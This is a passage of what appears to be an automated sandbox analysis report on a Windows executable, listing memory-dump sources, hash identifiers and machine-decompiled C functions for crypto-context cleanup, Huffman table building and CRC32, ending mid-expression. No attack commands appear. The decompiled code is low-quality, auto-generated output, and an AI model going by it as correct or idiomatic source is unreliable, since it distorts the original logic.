                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
                                                            • Instruction ID: 90343a8667ee0670e87e021bba3e221c8adc0c1da1bb1a76252bfdf766af77e9
                                                            • Opcode Fuzzy Hash: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
                                                            • Instruction Fuzzy Hash: FB520CB5900609EFCB14CF69C580AAABBF1FF49315F10852EE95AA7780D338EA55CF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 16%
                                                            			E004018B9(void* __ecx) {
                                                            				signed int _t10;
                                                            				signed int _t11;
                                                            				long* _t12;
                                                            				void* _t13;
                                                            				void* _t18;
                                                            
                                                            				_t18 = __ecx;
                                                            				_t10 =  *(__ecx + 8);
                                                            				if(_t10 != 0) {
                                                            					 *0x40f89c(_t10);
                                                            					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
                                                            				}
                                                            				_t11 =  *(_t18 + 0xc);
                                                            				if(_t11 != 0) {
                                                            					 *0x40f89c(_t11);
                                                            					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
                                                            				}
                                                            				_t12 =  *(_t18 + 4);
                                                            				if(_t12 != 0) {
                                                            					CryptReleaseContext(_t12, 0);
                                                            					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
                                                            				}
                                                            				_t13 = 1;
                                                            				return _t13;
                                                            			}








                                                            0x004018ba
                                                            0x004018bc
                                                            0x004018c1
                                                            0x004018c4
                                                            0x004018ca
                                                            0x004018ca
                                                            0x004018ce
                                                            0x004018d3
                                                            0x004018d6
                                                            0x004018dc
                                                            0x004018dc
                                                            0x004018e0
                                                            0x004018e5
                                                            0x004018ea
                                                            0x004018f0
                                                            0x004018f0
                                                            0x004018f6
                                                            0x004018f8

                                                            APIs
                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ContextCryptRelease
                                                            • String ID:
                                                            • API String ID: 829835001-0
                                                            • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                            • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                                                            • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                            • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00404C19(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32, signed int* _a36, signed char* _a40) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				signed char* _v20;
                                                            				intOrPtr _v24;
                                                            				signed int _v28;
                                                            				signed int _v32;
                                                            				intOrPtr* _v36;
                                                            				void* _v40;
                                                            				char _v43;
                                                            				signed char _v44;
                                                            				signed int _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				char _v60;
                                                            				signed int _v64;
                                                            				signed int _v68;
                                                            				signed int _v72;
                                                            				signed int _v76;
                                                            				signed int _v80;
                                                            				signed int _v84;
                                                            				signed int _v88;
                                                            				signed int _v92;
                                                            				signed int _v96;
                                                            				signed int _v100;
                                                            				signed int _v104;
                                                            				signed int _v108;
                                                            				signed int _v112;
                                                            				char _v116;
                                                            				signed int _v120;
                                                            				signed int _v180;
                                                            				signed int _v184;
                                                            				signed int _v244;
                                                            				signed int _t190;
                                                            				intOrPtr* _t192;
                                                            				signed int _t193;
                                                            				void* _t194;
                                                            				void* _t195;
                                                            				signed int _t196;
                                                            				signed int _t199;
                                                            				intOrPtr _t203;
                                                            				intOrPtr _t207;
                                                            				signed char* _t211;
                                                            				signed char _t212;
                                                            				signed int _t214;
                                                            				signed int _t216;
                                                            				signed int _t217;
                                                            				signed int _t218;
                                                            				intOrPtr* _t220;
                                                            				signed int _t224;
                                                            				signed int _t225;
                                                            				signed int _t226;
                                                            				signed int _t228;
                                                            				intOrPtr _t229;
                                                            				signed int _t231;
                                                            				char _t233;
                                                            				signed int _t235;
                                                            				signed int _t236;
                                                            				signed int _t237;
                                                            				signed int _t241;
                                                            				signed int _t242;
                                                            				intOrPtr _t243;
                                                            				signed int* _t244;
                                                            				signed int _t246;
                                                            				signed int _t247;
                                                            				signed int* _t248;
                                                            				signed int _t249;
                                                            				intOrPtr* _t250;
                                                            				intOrPtr _t251;
                                                            				signed int _t252;
                                                            				signed char _t257;
                                                            				signed int _t266;
                                                            				signed int _t269;
                                                            				signed char _t271;
                                                            				intOrPtr _t275;
                                                            				signed char* _t277;
                                                            				signed int _t280;
                                                            				signed int _t282;
                                                            				signed int _t283;
                                                            				signed int _t284;
                                                            				intOrPtr* _t287;
                                                            				intOrPtr _t294;
                                                            				signed int _t296;
                                                            				intOrPtr* _t297;
                                                            				intOrPtr _t298;
                                                            				intOrPtr _t300;
                                                            				signed char _t302;
                                                            				void* _t306;
                                                            				signed int _t307;
                                                            				signed int _t308;
                                                            				intOrPtr* _t309;
                                                            				signed int _t312;
                                                            				signed int _t313;
                                                            				signed int _t314;
                                                            				signed int _t315;
                                                            				signed int _t319;
                                                            				intOrPtr _t320;
                                                            				unsigned int _t321;
                                                            				intOrPtr* _t322;
                                                            				void* _t323;
                                                            
                                                            				_t248 = _a4;
                                                            				_t296 = _a8;
                                                            				_t280 = 0;
                                                            				_v120 = 0;
                                                            				_v116 = 0;
                                                            				_v112 = 0;
                                                            				_v108 = 0;
                                                            				_v104 = 0;
                                                            				_v100 = 0;
                                                            				_v96 = 0;
                                                            				_v92 = 0;
                                                            				_v88 = 0;
                                                            				_v84 = 0;
                                                            				_v80 = 0;
                                                            				_v76 = 0;
                                                            				_v72 = 0;
                                                            				_v68 = 0;
                                                            				_v64 = 0;
                                                            				_v60 = 0;
                                                            				_t307 = _t296;
                                                            				do {
                                                            					_t190 =  *_t248;
                                                            					_t248 =  &(_t248[1]);
                                                            					 *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) =  *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) + 1;
                                                            					_t307 = _t307 - 1;
                                                            				} while (_t307 != 0);
                                                            				if(_v120 != _t296) {
                                                            					_t297 = _a28;
                                                            					_t241 = 1;
                                                            					_t192 =  &_v116;
                                                            					_t308 =  *_t297;
                                                            					_t249 = _t241;
                                                            					_a28 = _t308;
                                                            					while( *_t192 == _t280) {
                                                            						_t249 = _t249 + 1;
                                                            						_t192 = _t192 + 4;
                                                            						if(_t249 <= 0xf) {
                                                            							continue;
                                                            						}
                                                            						break;
                                                            					}
                                                            					_v8 = _t249;
                                                            					if(_t308 < _t249) {
                                                            						_a28 = _t249;
                                                            					}
                                                            					_t309 =  &_v60;
                                                            					_t193 = 0xf;
                                                            					while( *_t309 == _t280) {
                                                            						_t193 = _t193 - 1;
                                                            						_t309 = _t309 - 4;
                                                            						if(_t193 != _t280) {
                                                            							continue;
                                                            						}
                                                            						break;
                                                            					}
                                                            					_v28 = _t193;
                                                            					if(_a28 > _t193) {
                                                            						_a28 = _t193;
                                                            					}
                                                            					_t242 = _t241 << _t249;
                                                            					 *_t297 = _a28;
                                                            					if(_t249 >= _t193) {
                                                            						L20:
                                                            						_t312 = _t193 << 2;
                                                            						_t298 =  *((intOrPtr*)(_t323 + _t312 - 0x74));
                                                            						_t250 = _t323 + _t312 - 0x74;
                                                            						_t243 = _t242 - _t298;
                                                            						_v52 = _t243;
                                                            						if(_t243 < 0) {
                                                            							goto L39;
                                                            						}
                                                            						_v180 = _t280;
                                                            						 *_t250 = _t298 + _t243;
                                                            						_t251 = 0;
                                                            						_t195 = _t193 - 1;
                                                            						if(_t195 == 0) {
                                                            							L24:
                                                            							_t244 = _a4;
                                                            							_t300 = 0;
                                                            							do {
                                                            								_t196 =  *_t244;
                                                            								_t244 =  &(_t244[1]);
                                                            								if(_t196 != _t280) {
                                                            									_t252 =  *(_t323 + _t196 * 4 - 0xb4);
                                                            									 *((intOrPtr*)(_a40 + _t252 * 4)) = _t300;
                                                            									 *(_t323 + _t196 * 4 - 0xb4) = _t252 + 1;
                                                            									_t280 = 0;
                                                            								}
                                                            								_t300 = _t300 + 1;
                                                            							} while (_t300 < _a8);
                                                            							_v12 = _v12 | 0xffffffff;
                                                            							_a8 =  *((intOrPtr*)(_t323 + _t312 - 0xb4));
                                                            							_v16 = _t280;
                                                            							_v20 = _a40;
                                                            							_t199 = _v8;
                                                            							_t246 =  ~_a28;
                                                            							_v184 = _t280;
                                                            							_v244 = _t280;
                                                            							_v32 = _t280;
                                                            							_a4 = _t280;
                                                            							if(_t199 > _v28) {
                                                            								L64:
                                                            								if(_v52 == _t280 || _v28 == 1) {
                                                            									L4:
                                                            									return 0;
                                                            								} else {
                                                            									_push(0xfffffffb);
                                                            									goto L67;
                                                            								}
                                                            							}
                                                            							_v48 = _t199 - 1;
                                                            							_v36 = _t323 + _t199 * 4 - 0x74;
                                                            							do {
                                                            								_t203 =  *_v36;
                                                            								_v24 = _t203 - 1;
                                                            								if(_t203 == 0) {
                                                            									goto L63;
                                                            								} else {
                                                            									goto L31;
                                                            								}
                                                            								do {
                                                            									L31:
                                                            									_t207 = _a28 + _t246;
                                                            									if(_v8 <= _t207) {
                                                            										L46:
                                                            										_v43 = _v8 - _t246;
                                                            										_t257 = _a40 + _a8 * 4;
                                                            										_t211 = _v20;
                                                            										if(_t211 < _t257) {
                                                            											_t212 =  *_t211;
                                                            											if(_t212 >= _a12) {
                                                            												_t214 = _t212 - _a12 << 2;
                                                            												_v44 =  *((intOrPtr*)(_t214 + _a20)) + 0x50;
                                                            												_t302 =  *(_t214 + _a16);
                                                            											} else {
                                                            												_t302 = _t212;
                                                            												asm("sbb cl, cl");
                                                            												_v44 = (_t257 & 0x000000a0) + 0x60;
                                                            											}
                                                            											_v20 =  &(_v20[4]);
                                                            											L52:
                                                            											_t313 = 1;
                                                            											_t314 = _t313 << _v8 - _t246;
                                                            											_t216 = _v16 >> _t246;
                                                            											if(_t216 >= _a4) {
                                                            												L56:
                                                            												_t217 = 1;
                                                            												_t218 = _t217 << _v48;
                                                            												_t266 = _v16;
                                                            												while((_t266 & _t218) != 0) {
                                                            													_t266 = _t266 ^ _t218;
                                                            													_t218 = _t218 >> 1;
                                                            												}
                                                            												_v16 = _t266 ^ _t218;
                                                            												_t220 = _t323 + _v12 * 4 - 0xb4;
                                                            												while(1) {
                                                            													_t315 = 1;
                                                            													if(((_t315 << _t246) - 0x00000001 & _v16) ==  *_t220) {
                                                            														goto L62;
                                                            													}
                                                            													_v12 = _v12 - 1;
                                                            													_t220 = _t220 - 4;
                                                            													_t246 = _t246 - _a28;
                                                            												}
                                                            												goto L62;
                                                            											}
                                                            											_t277 = _v32 + _t216 * 8;
                                                            											do {
                                                            												_t216 = _t216 + _t314;
                                                            												 *_t277 = _v44;
                                                            												_t277[4] = _t302;
                                                            												_t277 = _t277 + (_t314 << 3);
                                                            											} while (_t216 < _a4);
                                                            											_t280 = 0;
                                                            											goto L56;
                                                            										}
                                                            										_v44 = 0xc0;
                                                            										goto L52;
                                                            									} else {
                                                            										goto L32;
                                                            									}
                                                            									do {
                                                            										L32:
                                                            										_t269 = _a28;
                                                            										_v12 = _v12 + 1;
                                                            										_t246 = _t246 + _t269;
                                                            										_v56 = _t207 + _t269;
                                                            										_t224 = _v28 - _t246;
                                                            										_a4 = _t224;
                                                            										if(_t224 > _t269) {
                                                            											_a4 = _t269;
                                                            										}
                                                            										_t271 = _v8 - _t246;
                                                            										_t225 = 1;
                                                            										_t226 = _t225 << _t271;
                                                            										_t282 = _v24 + 1;
                                                            										if(_t226 <= _t282) {
                                                            											L40:
                                                            											_t283 = 1;
                                                            											_t228 =  *_a36;
                                                            											_t284 = _t283 << _t271;
                                                            											_a4 = _t284;
                                                            											_t319 = _t228 + _t284;
                                                            											if(_t319 > 0x5a0) {
                                                            												goto L39;
                                                            											}
                                                            										} else {
                                                            											_t320 = _v36;
                                                            											_t236 = _t226 + (_t282 | 0xffffffff) - _v24;
                                                            											if(_t271 >= _a4) {
                                                            												goto L40;
                                                            											} else {
                                                            												goto L36;
                                                            											}
                                                            											while(1) {
                                                            												L36:
                                                            												_t271 = _t271 + 1;
                                                            												if(_t271 >= _a4) {
                                                            													goto L40;
                                                            												}
                                                            												_t294 =  *((intOrPtr*)(_t320 + 4));
                                                            												_t320 = _t320 + 4;
                                                            												_t237 = _t236 << 1;
                                                            												if(_t237 <= _t294) {
                                                            													goto L40;
                                                            												}
                                                            												_t236 = _t237 - _t294;
                                                            											}
                                                            											goto L40;
                                                            										}
                                                            										_t229 = _a32 + _t228 * 8;
                                                            										_v32 = _t229;
                                                            										_t287 = _t323 + _v12 * 4 - 0xf0;
                                                            										 *_t287 = _t229;
                                                            										 *_a36 = _t319;
                                                            										_t231 = _v12;
                                                            										if(_t231 == 0) {
                                                            											 *_a24 = _v32;
                                                            										} else {
                                                            											_t321 = _v16;
                                                            											 *(_t323 + _t231 * 4 - 0xb4) = _t321;
                                                            											_t233 = _a28;
                                                            											_v44 = _t271;
                                                            											_v43 = _t233;
                                                            											_t235 = _t321 >> _t246 - _t233;
                                                            											_t275 =  *((intOrPtr*)(_t287 - 4));
                                                            											_t302 = (_v32 - _t275 >> 3) - _t235;
                                                            											 *(_t275 + _t235 * 8) = _v44;
                                                            											 *(_t275 + 4 + _t235 * 8) = _t302;
                                                            										}
                                                            										_t207 = _v56;
                                                            									} while (_v8 > _t207);
                                                            									_t280 = 0;
                                                            									goto L46;
                                                            									L62:
                                                            									_v24 = _v24 - 1;
                                                            								} while (_v24 != 0);
                                                            								L63:
                                                            								_v8 = _v8 + 1;
                                                            								_v36 = _v36 + 4;
                                                            								_v48 = _v48 + 1;
                                                            							} while (_v8 <= _v28);
                                                            							goto L64;
                                                            						}
                                                            						_t306 = 0;
                                                            						do {
                                                            							_t251 = _t251 +  *((intOrPtr*)(_t323 + _t306 - 0x70));
                                                            							_t306 = _t306 + 4;
                                                            							_t195 = _t195 - 1;
                                                            							 *((intOrPtr*)(_t323 + _t306 - 0xb0)) = _t251;
                                                            						} while (_t195 != 0);
                                                            						goto L24;
                                                            					} else {
                                                            						_t322 = _t323 + _t249 * 4 - 0x74;
                                                            						while(1) {
                                                            							_t247 = _t242 -  *_t322;
                                                            							if(_t247 < 0) {
                                                            								break;
                                                            							}
                                                            							_t249 = _t249 + 1;
                                                            							_t322 = _t322 + 4;
                                                            							_t242 = _t247 << 1;
                                                            							if(_t249 < _t193) {
                                                            								continue;
                                                            							}
                                                            							goto L20;
                                                            						}
                                                            						L39:
                                                            						_push(0xfffffffd);
                                                            						L67:
                                                            						_pop(_t194);
                                                            						return _t194;
                                                            					}
                                                            				}
                                                            				 *_a24 = 0;
                                                            				 *_a28 = 0;
                                                            				goto L4;
                                                            			}







































































































                                                            0x00404c22
                                                            0x00404c28
                                                            0x00404c2b
                                                            0x00404c2d
                                                            0x00404c30
                                                            0x00404c33
                                                            0x00404c36
                                                            0x00404c39
                                                            0x00404c3c
                                                            0x00404c3f
                                                            0x00404c42
                                                            0x00404c45
                                                            0x00404c48
                                                            0x00404c4b
                                                            0x00404c4e
                                                            0x00404c51
                                                            0x00404c54
                                                            0x00404c57
                                                            0x00404c5a
                                                            0x00404c5d
                                                            0x00404c5f
                                                            0x00404c5f
                                                            0x00404c61
                                                            0x00404c64
                                                            0x00404c6c
                                                            0x00404c6c
                                                            0x00404c72
                                                            0x00404c85
                                                            0x00404c8a
                                                            0x00404c8b
                                                            0x00404c8e
                                                            0x00404c90
                                                            0x00404c92
                                                            0x00404c95
                                                            0x00404c99
                                                            0x00404c9a
                                                            0x00404ca0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404ca0
                                                            0x00404ca4
                                                            0x00404ca7
                                                            0x00404ca9
                                                            0x00404ca9
                                                            0x00404cae
                                                            0x00404cb1
                                                            0x00404cb2
                                                            0x00404cb6
                                                            0x00404cb7
                                                            0x00404cbc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404cbc
                                                            0x00404cc1
                                                            0x00404cc4
                                                            0x00404cc6
                                                            0x00404cc6
                                                            0x00404ccc
                                                            0x00404cd0
                                                            0x00404cd2
                                                            0x00404cea
                                                            0x00404cec
                                                            0x00404cef
                                                            0x00404cf3
                                                            0x00404cf7
                                                            0x00404cf9
                                                            0x00404cfc
                                                            0x00000000
                                                            0x00000000
                                                            0x00404d04
                                                            0x00404d0a
                                                            0x00404d0c
                                                            0x00404d0e
                                                            0x00404d0f
                                                            0x00404d24
                                                            0x00404d24
                                                            0x00404d27
                                                            0x00404d29
                                                            0x00404d29
                                                            0x00404d2b
                                                            0x00404d30
                                                            0x00404d32
                                                            0x00404d43
                                                            0x00404d47
                                                            0x00404d49
                                                            0x00404d49
                                                            0x00404d4b
                                                            0x00404d4c
                                                            0x00404d5b
                                                            0x00404d5f
                                                            0x00404d65
                                                            0x00404d68
                                                            0x00404d6b
                                                            0x00404d6e
                                                            0x00404d73
                                                            0x00404d79
                                                            0x00404d7f
                                                            0x00404d82
                                                            0x00404d85
                                                            0x00404f85
                                                            0x00404f88
                                                            0x00404c7e
                                                            0x00000000
                                                            0x00404f98
                                                            0x00404f98
                                                            0x00000000
                                                            0x00404f98
                                                            0x00404f88
                                                            0x00404d95
                                                            0x00404d98
                                                            0x00404d9b
                                                            0x00404d9e
                                                            0x00404da5
                                                            0x00404da8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404dae
                                                            0x00404dae
                                                            0x00404db1
                                                            0x00404db6
                                                            0x00404e9a
                                                            0x00404ea2
                                                            0x00404ea8
                                                            0x00404eab
                                                            0x00404eb0
                                                            0x00404eb8
                                                            0x00404ebd
                                                            0x00404ed9
                                                            0x00404ee2
                                                            0x00404ee8
                                                            0x00404ebf
                                                            0x00404ec4
                                                            0x00404ec6
                                                            0x00404ece
                                                            0x00404ece
                                                            0x00404eeb
                                                            0x00404eef
                                                            0x00404ef9
                                                            0x00404efa
                                                            0x00404efe
                                                            0x00404f03
                                                            0x00404f23
                                                            0x00404f28
                                                            0x00404f29
                                                            0x00404f2b
                                                            0x00404f2e
                                                            0x00404f32
                                                            0x00404f34
                                                            0x00404f34
                                                            0x00404f3d
                                                            0x00404f40
                                                            0x00404f47
                                                            0x00404f4b
                                                            0x00404f54
                                                            0x00000000
                                                            0x00000000
                                                            0x00404f56
                                                            0x00404f59
                                                            0x00404f5c
                                                            0x00404f5c
                                                            0x00000000
                                                            0x00404f47
                                                            0x00404f08
                                                            0x00404f0b
                                                            0x00404f0e
                                                            0x00404f10
                                                            0x00404f17
                                                            0x00404f1a
                                                            0x00404f1c
                                                            0x00404f21
                                                            0x00000000
                                                            0x00404f21
                                                            0x00404eb2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404dbc
                                                            0x00404dbc
                                                            0x00404dbc
                                                            0x00404dbf
                                                            0x00404dc4
                                                            0x00404dc6
                                                            0x00404dcc
                                                            0x00404dd0
                                                            0x00404dd3
                                                            0x00404dd5
                                                            0x00404dd5
                                                            0x00404de0
                                                            0x00404de2
                                                            0x00404de3
                                                            0x00404de5
                                                            0x00404de8
                                                            0x00404e17
                                                            0x00404e1c
                                                            0x00404e1d
                                                            0x00404e1f
                                                            0x00404e21
                                                            0x00404e24
                                                            0x00404e2d
                                                            0x00000000
                                                            0x00000000
                                                            0x00404dea
                                                            0x00404dea
                                                            0x00404df3
                                                            0x00404df8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404dfa
                                                            0x00404dfa
                                                            0x00404dfa
                                                            0x00404dfe
                                                            0x00000000
                                                            0x00000000
                                                            0x00404e00
                                                            0x00404e03
                                                            0x00404e06
                                                            0x00404e0a
                                                            0x00000000
                                                            0x00000000
                                                            0x00404e0c
                                                            0x00404e0c
                                                            0x00000000
                                                            0x00404dfa
                                                            0x00404e32
                                                            0x00404e38
                                                            0x00404e3b
                                                            0x00404e42
                                                            0x00404e47
                                                            0x00404e49
                                                            0x00404e4e
                                                            0x00404e8a
                                                            0x00404e50
                                                            0x00404e50
                                                            0x00404e56
                                                            0x00404e5d
                                                            0x00404e60
                                                            0x00404e65
                                                            0x00404e6c
                                                            0x00404e6e
                                                            0x00404e79
                                                            0x00404e7b
                                                            0x00404e7e
                                                            0x00404e7e
                                                            0x00404e8c
                                                            0x00404e8f
                                                            0x00404e98
                                                            0x00000000
                                                            0x00404f61
                                                            0x00404f64
                                                            0x00404f67
                                                            0x00404f6f
                                                            0x00404f6f
                                                            0x00404f72
                                                            0x00404f79
                                                            0x00404f7c
                                                            0x00000000
                                                            0x00404d9b
                                                            0x00404d11
                                                            0x00404d13
                                                            0x00404d13
                                                            0x00404d17
                                                            0x00404d1a
                                                            0x00404d1b
                                                            0x00404d1b
                                                            0x00000000
                                                            0x00404cd4
                                                            0x00404cd4
                                                            0x00404cd8
                                                            0x00404cd8
                                                            0x00404cda
                                                            0x00000000
                                                            0x00000000
                                                            0x00404ce0
                                                            0x00404ce1
                                                            0x00404ce4
                                                            0x00404ce8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404ce8
                                                            0x00404e10
                                                            0x00404e10
                                                            0x00404f9a
                                                            0x00404f9a
                                                            0x00000000
                                                            0x00404f9a
                                                            0x00404cd2
                                                            0x00404c77
                                                            0x00404c7c
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
                                                            • Instruction ID: 9637f4fcf05056c634a246d4ec164b1eccd92df816b65a9601eba7856632ad8a
                                                            • Opcode Fuzzy Hash: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
                                                            • Instruction Fuzzy Hash: 36D1F5B1A002199FDF14CFA9D9805EDBBB1FF88314F25826AD959B7390D734AA41CB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040541F(signed int _a4, signed char* _a8, unsigned int _a12) {
                                                            				signed int _t35;
                                                            				signed char* _t73;
                                                            				signed char* _t74;
                                                            				signed char* _t75;
                                                            				signed char* _t76;
                                                            				signed char* _t77;
                                                            				signed char* _t78;
                                                            				signed char* _t79;
                                                            				unsigned int _t85;
                                                            
                                                            				_t73 = _a8;
                                                            				if(_t73 != 0) {
                                                            					_t35 =  !_a4;
                                                            					if(_a12 >= 8) {
                                                            						_t85 = _a12 >> 3;
                                                            						do {
                                                            							_a12 = _a12 - 8;
                                                            							_t74 =  &(_t73[1]);
                                                            							_t75 =  &(_t74[1]);
                                                            							_t76 =  &(_t75[1]);
                                                            							_t77 =  &(_t76[1]);
                                                            							_t78 =  &(_t77[1]);
                                                            							_t79 =  &(_t78[1]);
                                                            							_t35 = ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 